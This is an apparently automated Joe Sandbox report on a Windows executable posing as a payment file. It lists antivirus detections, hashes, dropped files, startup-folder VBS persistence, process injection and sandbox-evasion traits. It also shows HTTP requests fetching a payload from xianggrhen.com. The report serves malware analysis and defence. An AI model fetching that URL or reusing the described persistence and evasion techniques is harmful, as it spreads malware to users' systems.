Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Overview

General Information

Sample name:MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Analysis ID:1569870
MD5:622b4fb4e2d8e9a803f526a77c867590
SHA1:ecfac03a1de7cbef3b10f0e73c251b77edb63969
SHA256:006c7725348c5fe7ef76cbce10e36c8cc5ba01c484d1107f63a29768d11dce86
Tags:exePaymentuser-cocaman
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1644753165.00000000065B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 8140JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.65b0000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, ProcessId: 7724, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeAvira: detected
              Source: C:\Users\user\AppData\Local\scriptcase-php8.exeAvira: detection malicious, Label: HEUR/AGEN.1323343
              Source: C:\Users\user\AppData\Local\scriptcase-php8.exeReversingLabs: Detection: 18%
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeReversingLabs: Detection: 18%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
              Source: C:\Users\user\AppData\Local\scriptcase-php8.exeJoe Sandbox ML: detected
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeJoe Sandbox ML: detected
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.pdbeA source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbg source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb2 source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
              Source: global trafficHTTP traffic detected: GET /camp/Reibbfkkyy.dat HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /camp/Reibbfkkyy.dat HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: xianggrhen.com
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: scriptcase-php8.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xianggrhen.com
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xianggrhen.com/camp/Reibbfkkyy.dat
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_05654528 NtProtectVirtualMemory,0_2_05654528
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_05656680 NtResumeThread,0_2_05656680
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_05654520 NtProtectVirtualMemory,0_2_05654520
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_05656678 NtResumeThread,0_2_05656678
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_027EE3C00_2_027EE3C0
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_027EA0500_2_027EA050
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_027EA0400_2_027EA040
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_027EA9E00_2_027EA9E0
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_05650F300_2_05650F30
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_056534680_2_05653468
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_05650F210_2_05650F21
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_06F2E7400_2_06F2E740
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_06F2DBD00_2_06F2DBD0
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_06F100400_2_06F10040
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 0_2_06F100060_2_06F10006
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E52C13_2_026E52C1
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E52D03_2_026E52D0
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E1C403_2_026E1C40
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E1C2F3_2_026E1C2F
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E448B3_2_026E448B
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeCode function: 3_2_026E49803_2_026E4980
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: invalid certificate
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003F22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVsbud.exe" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003E72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1642929348.00000000061D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameYqvrmkgm.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000000.1310594913.00000000005BC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626014604.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.00000000028A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1642300919.0000000006030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVsbud.exe" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2555208724.0000000002921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2555740223.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2553600654.00000000005BA000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVsbud.exe" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2555740223.0000000003985000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2558178563.0000000004F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameJfmqkg.dll" vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeBinary or memory string: OriginalFilenameYicmwgcqhak.exeN vs MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: classification engineClassification label: mal100.expl.evad.winEXE@4/3@1/1
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbsJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:64:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ecbc8bf7-1d32-4490-896f-db1e8f83d8d5Jump to behavior
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeFile read: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeSection loaded: apphelp.dllJump to behavior
